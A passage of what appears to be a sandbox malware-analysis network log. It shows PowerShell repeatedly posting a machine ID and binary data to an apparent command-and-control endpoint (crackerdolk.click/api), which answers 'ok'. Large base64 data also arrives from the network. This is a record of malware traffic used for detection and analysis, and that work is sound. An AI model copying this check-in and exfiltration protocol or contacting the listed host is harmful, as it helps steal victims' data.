2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 39 52 4d 69 7a 75 78 78 2f 4e 45 58 30 33 74 73 6c 42 49 49 2b 54 75 6b 36 73 5a 6f 78 57 5a 62 32 77 4e 36 70 39 6e 68 65 72 44 56 45 68 2f 72 36 47 33 56 37 48 62 65 46 34 53 49 66 6e 43 52 4d 39 7a 62 32 6a 58 5a 48 32 66 62 45 6d 50 36 31 4d 42 7a 69 4e 31 2f 49 70 62 73 37 64 33 63 65 6f 49 44 34 5a 67 72 64 4d 67 50 2b 4d 4c 48 64 50 30 62 59 38 4d 47 65 34 37 35 37 57 61 63 69 54 49 48 77 39 68 74 71 66 68 4b 33 6a 65 34 73 48 35 77 68 52 2f 51 78 39 34 56 2f 41 4a 69 78 79 34 61 78 37 6a 42 78 70 79 42 41 68 4f 75 35 49 53 64 72 55 36 33 4e 37 69 70 56 79 32 74 4c 2f 44 2f 79 6a 6e 42 44 33 76 72 65 6e 75 4f 77 66 56 65 77 4e 6b 4b 47 39 2f 67 4a 62 58 6f 62 74 34 54 69 4c 78 43 55 4c 77 4f 33 66 50 61 64 50 78 69 57 30 4d 47 56 2f 62 78 6e 55 75 Data Ascii: 9RMizuxx/NEX03tslBII+Tuk6sZoxWZb2wN6p9nherDVEh/r6G3V7HbeF4SIfnCRM9zb2jXZH2fbEmP61MBziN1/Ipbs7d3ceoID4ZgrdMgP+MLHdP0bY8MGe4757WaciTIHw9htqfhK3je4sH5whR/Qx94V/AJixy4ax7jBxpyBAhOu5ISdrU63N7ipVy2tL/D/yjnBD3vrenuOwfVewNkKG9/gJbXobt4TiLxCULwO3fPadPxiW0MGV/bxnUu
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 2f 66 63 4a 61 33 34 62 75 34 44 6c 5a 6c 76 54 4c 46 75 35 5a 4c 47 76 66 46 54 56 2b 34 36 72 38 72 68 2b 56 62 52 77 57 4d 62 6b 75 78 78 72 4e 45 58 30 67 4f 67 75 45 34 45 6b 54 76 6f 79 2f 34 70 36 54 39 37 78 7a 4a 50 30 73 6e 74 5a 6f 54 31 44 6d 76 66 37 45 32 4a 31 46 37 37 4e 70 32 59 53 69 32 73 62 75 51 33 6d 6a 6a 31 31 31 66 2f 43 6d 65 66 32 62 78 79 37 63 45 43 45 76 61 4e 62 61 6e 77 59 73 59 4c 6f 4c 42 75 57 49 55 2f 78 4d 76 4b 58 63 45 54 57 2f 63 53 55 2f 4c 68 30 57 71 73 37 54 49 37 39 2b 68 45 6e 4f 6c 32 7a 6c 61 6c 2b 56 61 63 73 54 2f 51 7a 73 37 42 38 54 74 6a 32 32 74 37 75 2b 47 6b 53 70 54 77 48 30 4c 33 33 45 6d 64 2f 46 37 43 4e 37 69 73 51 6b 43 78 41 39 44 76 37 69 33 68 45 32 76 6a 42 6d 50 47 78 64 46 65 77 4e 55 36 Data Ascii: /fcJa34bu4DlZlvTLFu5ZLGvfFTV+46r8rh+VbRwWMbkuxxrNEX0gOguE4EkTvoy/4p6T97xzJP0sntZoT1Dmvf7E2J1F77Np2YSi2sbuQ3mjj111f/Cmef2bxy7cECEvaNbanwYsYLoLBuWIU/xMvKXcETW/cSU/Lh0Wqs7TI79+hEnOl2zlal+VacsT/Qzs7B8Ttj22t7u+GkSpTwH0L33Emd/F7CN7isQkCxA9Dv7i3hE2vjBmPGxdFewNU6
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 6d 6c 69 58 61 76 44 38 47 59 53 6e 32 73 62 75 54 58 34 6c 33 46 4f 33 2f 7a 4b 6c 76 61 34 66 56 6d 6b 4f 30 43 50 2b 2f 59 54 61 6e 45 65 74 59 6e 6a 4e 42 61 59 49 55 37 7a 66 4c 2f 46 65 46 69 57 71 59 79 35 2f 5a 39 67 53 62 41 6d 42 35 65 7a 34 6c 74 67 65 46 33 73 7a 65 6f 70 48 4a 77 6a 53 2f 59 7a 39 59 74 35 52 74 76 30 77 35 54 6a 76 6e 35 66 71 54 39 4d 6d 76 33 32 48 32 74 77 46 62 2b 48 71 57 68 56 6c 44 4d 44 6f 58 7a 45 69 48 42 41 31 65 65 4d 67 62 2b 76 4d 46 57 75 63 42 2f 49 38 66 55 62 61 48 67 52 76 34 58 6f 4b 68 75 55 4c 6b 72 78 4e 4f 4f 45 65 30 6a 58 2f 38 4f 66 39 62 4e 31 56 71 55 30 51 59 65 39 74 56 74 67 62 46 33 73 7a 63 59 42 49 4e 45 4b 65 62 6b 6a 76 35 77 2f 52 39 71 78 6c 4e 37 39 74 58 78 61 72 54 5a 4f 68 50 66 79 Data Ascii: mliXavD8GYSn2sbuTX4l3FO3/zKlva4fVmkO0CP+/YTanEetYnjNBaYIU7zfL/FeFiWqYy5/Z9gSbAmB5ez4ltgeF3szeopHJwjS/Yz9Yt5Rtv0w5Tjvn5fqT9Mmv32H2twFb+HqWhVlDMDoXzEiHBA1eeMgb+vMFWucB/I8fUbaHgRv4XoKhuULkrxNOOEe0jX/8Of9bN1VqU0QYe9tVtgbF3szcYBINEKebkjv5w/R9qxlN79tXxarTZOhPfy
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 61 77 6a 75 30 6a 47 70 49 71 52 65 73 37 2b 4a 64 78 54 64 6e 35 78 4a 66 77 73 6e 56 66 70 44 78 4e 69 66 72 31 46 57 38 30 55 2f 53 4b 38 57 5a 4e 30 77 70 54 34 69 37 6e 69 46 35 4e 32 62 48 54 30 4f 6a 32 64 31 37 69 61 41 65 42 37 2f 38 57 64 58 30 61 75 6f 4c 71 4e 42 53 65 49 46 48 2b 4d 2f 57 43 63 30 62 5a 39 38 32 62 2b 37 70 33 56 36 6b 2f 53 38 69 7a 75 78 78 2f 4e 45 58 30 6f 2b 49 31 41 70 41 6c 53 4f 38 6e 73 5a 6f 78 57 5a 62 32 77 4e 36 70 39 6e 4e 5a 71 54 52 48 68 50 33 2f 46 6d 64 6d 45 72 4f 4b 34 43 30 48 6d 53 78 45 38 6a 54 36 69 6e 6c 53 32 76 2f 65 6d 2b 4f 6b 4d 42 7a 69 4e 31 2f 49 70 62 73 74 59 47 51 4e 74 38 2f 59 4d 42 61 46 49 45 37 31 66 4f 37 4c 5a 67 44 52 2f 59 7a 47 73 62 42 2f 57 36 45 2f 52 6f 48 78 39 68 35 75 63 Data Ascii: awju0jGpIqRes7+JdxTdn5xJfwsnVfpDxNifr1FW80U/SK8WZN0wpT4i7niF5N2bHT0Oj2d17iaAeB7/8WdX0auoLqNBSeIFH+M/WCc0bZ982b+7p3V6k/S8izuxx/NEX0o+I1ApAlSO8nsZoxWZb2wN6p9nNZqTRHhP3/FmdmErOK4C0HmSxE8jT6inlS2v/em+OkMBziN1/IpbstYGQNt8/YMBaFIE71fO7LZgDR/YzGsbB/W6E/RoHx9h5uc
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 69 4b 43 65 51 4d 41 50 6d 63 75 6a 46 65 45 79 57 71 59 79 64 39 72 56 78 57 4b 73 38 53 49 2f 35 36 52 46 67 5a 68 79 31 68 75 51 71 46 5a 34 6d 53 66 67 31 2f 49 6c 79 52 39 48 2b 79 64 36 2f 39 6e 64 4b 34 6d 67 48 71 66 44 77 46 7a 77 75 58 61 76 44 38 47 59 53 6e 32 73 62 75 54 7a 37 67 48 56 4e 31 66 37 50 6a 50 43 77 59 6c 4b 76 4f 6c 57 43 39 76 34 57 61 6e 6b 65 73 6f 76 69 4b 67 65 61 4b 30 44 79 66 4c 2f 46 65 46 69 57 71 59 79 39 35 71 42 36 56 61 34 6d 54 49 6e 2b 37 52 5a 33 4e 46 50 30 6e 4f 34 33 56 63 73 39 55 2b 34 37 37 73 74 6d 41 4e 48 39 6a 4d 61 78 73 48 6c 55 70 54 5a 4a 6d 76 6a 39 46 47 68 39 46 4c 43 46 36 69 59 52 6c 79 78 47 2b 6a 44 36 67 6e 78 50 30 76 6a 43 6c 2f 37 32 50 68 4b 6c 4b 41 66 51 76 64 6f 41 5a 48 67 51 39 4a Data Ascii: iKCeQMAPmcujFeEyWqYyd9rVxWKs8SI/56RFgZhy1huQqFZ4mSfg1/IlyR9H+yd6/9ndK4mgHqfDwFzwuXavD8GYSn2sbuTz7gHVN1f7PjPCwYlKvOlWC9v4WankesoviKgeaK0DyfL/FeFiWqYy95qB6Va4mTIn+7RZ3NFP0nO43Vcs9U+477stmANH9jMaxsHlUpTZJmvj9FGh9FLCF6iYRlyxG+jD6gnxP0vjCl/72PhKlKAfQvdoAZHgQ9J
2024-12-29 08:25:10 UTC	257	IN	Data Raw: 30 32 55 44 2f 69 53 78 33 54 39 67 33 65 66 4a 6d 65 66 30 52 56 47 73 50 6b 43 65 76 65 51 6b 4b 54 51 63 39 4e 58 51 50 31 57 46 61 78 75 72 63 72 47 58 50 78 69 57 74 73 2b 4d 34 37 42 7a 52 4b 46 33 65 62 62 61 37 52 46 67 5a 42 71 6a 67 71 6c 6f 56 5a 78 72 47 38 42 38 2b 49 4a 6b 55 63 44 38 33 4a 6d 78 69 54 34 53 75 6e 41 66 79 4d 6a 34 46 57 6c 7a 43 36 58 41 7a 6a 41 66 6c 44 74 45 37 6a 4f 78 79 7a 39 47 6c 71 6d 66 30 4c 47 79 59 52 4c 36 59 42 58 54 71 4b 68 4d 4e 79 59 43 2b 70 53 70 4d 46 58 4c 65 51 32 35 4c 72 48 64 50 77 66 56 34 39 36 59 38 71 42 7a 46 5a 77 4f 59 4a 4c 77 2f 51 78 32 53 69 4f 7a 6c 2b 51 67 41 6f 4a 6e 56 76 6f 79 2f 34 4a 70 41 4a 69 78 77 39 36 70 6a 7a 41 61 34 67 38 4a 79 4f 57 37 51 79 64 42 48 72 71 44 37 6a 41 Data Ascii: 02UD/iSx3T9g3efJmef0RVGsPkCeveQkKTQc9NXQP1WFaxurcrGXPxiWts+M47BzRKF3ebba7RFgZBqjgqloVZxrG8B8+IJkUcD83JmxiT4SunAfyMj4FWlzC6XAzjAflDtE7jOxyz9Glqmf0LGyYRL6YBXTqKhMNyYC+pSpMFXLeQ25LrHdPwfV496Y8qBzFZwOYJLw/Qx2SiOzl+QgAoJnVvoy/4JpAJixw96pjzAa4g8JyOW7QydBHrqD7jA
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 33 31 66 64 0d 0a 45 33 67 78 5a 39 44 72 6d 6c 44 38 4f 6c 76 65 4d 78 71 48 34 4d 46 61 7a 63 42 2f 59 72 36 42 4f 4e 43 4e 4e 35 70 4b 6e 50 31 57 46 61 78 75 72 63 72 47 58 50 78 69 57 74 73 2b 4d 34 37 42 7a 52 4b 46 33 65 62 62 54 2f 42 31 69 63 77 33 32 6f 2b 49 79 45 74 4e 6c 41 2f 5a 38 71 62 77 2f 43 4a 62 4f 67 74 37 70 39 69 67 53 6c 7a 4e 4a 68 76 72 74 43 69 70 61 47 72 4b 49 37 6a 5a 58 76 53 42 58 2f 6e 79 2f 78 58 6b 41 6a 71 47 43 33 76 57 6e 4d 41 72 79 59 68 7a 64 72 71 78 4c 4e 57 74 54 72 63 33 2f 5a 6b 33 42 5a 51 50 72 66 4b 6e 46 4f 45 50 45 34 38 71 64 35 37 55 33 62 4a 77 7a 55 59 58 79 38 42 70 5a 53 6a 4f 35 6a 4f 6f 6f 56 36 49 39 54 75 6b 2f 39 49 4a 42 66 74 6a 32 32 4a 6e 2f 73 48 41 53 37 48 42 49 79 4b 58 43 57 79 38 30 Data Ascii: 31fdE3gxZ9DrmlD8OlveMxqH4MFazcB/Yr6BONCNN5pKnP1WFaxurcrGXPxiWts+M47BzRKF3ebbT/B1icw32o+IyEtNlA/Z8qbw/CJbOgt7p9igSlzNJhvrtCipaGrKI7jZXvSBX/ny/xXkAjqGC3vWnMAryYhzdrqxLNWtTrc3/Zk3BZQPrfKnFOEPE48qd57U3bJwzUYXy8BpZSjO5jOooV6I9Tuk/9IJBftj22Jn/sHAS7HBIyKXCWy80
2024-12-29 08:25:10 UTC	1369	IN	Data Raw: 6c 30 54 73 5a 34 46 4b 6c 75 37 73 74 6d 41 4d 43 78 6c 4d 79 2f 39 6d 49 53 2b 6e 41 41 69 2b 2f 70 48 57 52 69 48 76 4f 7a 31 77 45 62 6c 43 70 56 36 54 48 39 70 48 78 52 33 4d 2f 79 69 2f 4b 34 66 6c 57 30 49 51 66 47 76 66 52 62 50 30 31 64 2f 4d 33 57 61 46 57 4c 61 78 75 35 43 66 4b 4c 63 55 66 41 34 49 47 35 2f 37 46 78 52 4c 49 39 53 36 6e 2b 36 68 45 6e 4f 6c 32 79 7a 62 46 30 57 39 4d 76 55 72 6c 6b 6f 64 63 6b 46 59 57 6d 6e 4d 7a 75 2b 47 6b 53 74 48 41 66 32 72 4f 37 43 53 63 73 58 66 4f 4f 2b 7a 51 54 6b 44 31 41 76 67 4c 50 6f 47 68 44 78 76 66 50 6f 4d 2b 64 66 46 53 6c 4b 6b 43 4f 32 39 74 62 4b 54 51 53 39 4e 58 51 5a 6c 33 54 46 41 32 35 4a 4c 48 64 50 33 58 56 2f 38 4b 5a 35 36 63 39 64 37 55 7a 56 34 37 2b 75 31 55 6e 63 6c 33 73 33 Data Ascii: l0TsZ4FKlu7stmAMCxlMy/9mIS+nAAi+/pHWRiHvOz1wEblCpV6TH9pHxR3M/yi/K4flW0IQfGvfRbP01d/M3WaFWLaxu5CfKLcUfA4IG5/7FxRLI9S6n+6hEnOl2yzbF0W9MvUrlkodckFYWmnMzu+GkStHAf2rO7CScsXfOO+zQTkD1AvgLPoGhDxvfPoM+dfFSlKkCO29tbKTQS9NXQZl3TFA25JLHdP3XV/8KZ56c9d7UzV47+u1Uncl3s3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49945	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:11 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3E5I09CJ5Y2HCV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12810 Host: crackerdolk.click
2024-12-29 08:25:11 UTC	12810	OUT	Data Raw: 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35 59 32 48 43 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 33 45 35 49 30 39 43 4a 35 Data Ascii: --3E5I09CJ5Y2HCVContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--3E5I09CJ5Y2HCVContent-Disposition: form-data; name="pid"2--3E5I09CJ5Y2HCVContent-Disposition: form-data; name="lid"jMw1IE--bigJ--3E5I09CJ5
2024-12-29 08:25:13 UTC	1142	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cuh938h2qdiqjohf3f3m1504pm; expires=Thu, 24 Apr 2025 02:11:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woPvJ%2BTWuK0JedfymX2wE5yegOHMqFopKay2tVlsR4taHF4xZB0%2BirwFqMUbA5%2B4TazB%2F3AmUZ0eE%2Bq1reCluSCb60xD2Ib1Rq9gqVqoynNGRFXqHvIBOi%2BAFrrIMZmv%2FWV00A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9865eaad277d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1942&rtt_var=732&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13747&delivery_rate=1491317&cwnd=243&unsent_bytes=0&cid=9cc378f076a41cdf&ts=1150&x=0"
2024-12-29 08:25:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 08:25:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49951	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:14 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5P599PVX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15016 Host: crackerdolk.click
2024-12-29 08:25:14 UTC	15016	OUT	Data Raw: 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 35 50 35 39 39 50 56 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --5P599PVXContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--5P599PVXContent-Disposition: form-data; name="pid"2--5P599PVXContent-Disposition: form-data; name="lid"jMw1IE--bigJ--5P599PVXContent-Dispositi
2024-12-29 08:25:15 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ge7j12ij29gm2td3383a9f9qak; expires=Thu, 24 Apr 2025 02:11:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSLc4GL4Ob9HUST3SKg%2FmhSCuW6SZAjXLt0Qzgbju1I3EgCBNEFIAj3f6HHJ%2BPXzOv0f%2FikT4aDnccJnRqF54%2BnwMPs8%2FuM4j0X5a%2FfpCR58McE4Cu3UH4ifjORVFcOwx6HHkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9865f9ca65c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=635&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15947&delivery_rate=1720683&cwnd=244&unsent_bytes=0&cid=73fc28d00f0c6522&ts=909&x=0"
2024-12-29 08:25:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 08:25:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49957	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:16 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DEXSTRMOAR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20518 Host: crackerdolk.click
2024-12-29 08:25:16 UTC	15331	OUT	Data Raw: 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 44 45 58 53 54 52 4d 4f 41 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --DEXSTRMOARContent-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--DEXSTRMOARContent-Disposition: form-data; name="pid"3--DEXSTRMOARContent-Disposition: form-data; name="lid"jMw1IE--bigJ--DEXSTRMOARContent-D
2024-12-29 08:25:16 UTC	5187	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 Data Ascii: un 4F([:7s~X`nO`i`
2024-12-29 08:25:17 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nbjlsukuk9fkqine4dk5o0qaea; expires=Thu, 24 Apr 2025 02:11:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dr63q4%2BSF1VSRjwkmlJPwFCCU%2BqDIJk1k1fJ9LEsgml1w8q9l0BYQUVgKOksrKsh8O%2FKRxEGVOx5Fl6zAqW7Bnifc30WTyR6gRwNsZxt0ASq3gcqrOKy4mE1IX9gpAuwjK0pXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f98660869497d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1850&rtt_var=712&sent=11&recv=27&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21473&delivery_rate=1516883&cwnd=243&unsent_bytes=0&cid=1223efd98e129319&ts=993&x=0"
2024-12-29 08:25:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 08:25:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49965	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:19 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SIAS21YXWH20 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1218 Host: crackerdolk.click
2024-12-29 08:25:19 UTC	1218	OUT	Data Raw: 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 53 49 41 53 32 31 59 58 57 48 32 30 0d 0a 43 Data Ascii: --SIAS21YXWH20Content-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--SIAS21YXWH20Content-Disposition: form-data; name="pid"1--SIAS21YXWH20Content-Disposition: form-data; name="lid"jMw1IE--bigJ--SIAS21YXWH20C
2024-12-29 08:25:20 UTC	1142	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=94s6t1dg0e284og6p94efvmp12; expires=Thu, 24 Apr 2025 02:11:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YYQf5MsLHybmd5hF3kGYVpsBermd%2FauB3%2BT%2B2HO0ZRPalO1DAy9KZjF7G9zH3%2FUlrpT%2FL0SIeLhelSA2HLzivA37WO%2FT0HuSQtaghop28E%2F%2FfflSKD0Wt%2Bv4fc24ctr3H1IyNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9866180ef642d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: 